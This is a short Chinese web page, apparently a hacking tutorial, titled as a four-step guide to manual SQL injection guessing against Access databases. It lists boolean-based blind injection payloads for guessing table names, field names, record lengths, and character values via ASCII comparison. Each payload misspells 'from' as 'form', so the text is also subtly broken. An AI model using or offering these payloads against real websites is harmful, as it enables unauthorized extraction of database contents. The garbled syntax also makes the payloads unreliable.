手工注入猜解四步曲

1.猜解数据库
and (Select Count(*) form [数据库名])>0
2.猜字段
and (Select Count(字段名) form 数据库名)>0
3猜字段中记录长度
and (Select top 1 len(字段名) form 数据库名)>0
4.猜字段的ascii值(access)
and (Select top 1 asc(mid(字段名,1,1)) form 数据库名)>0

  网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)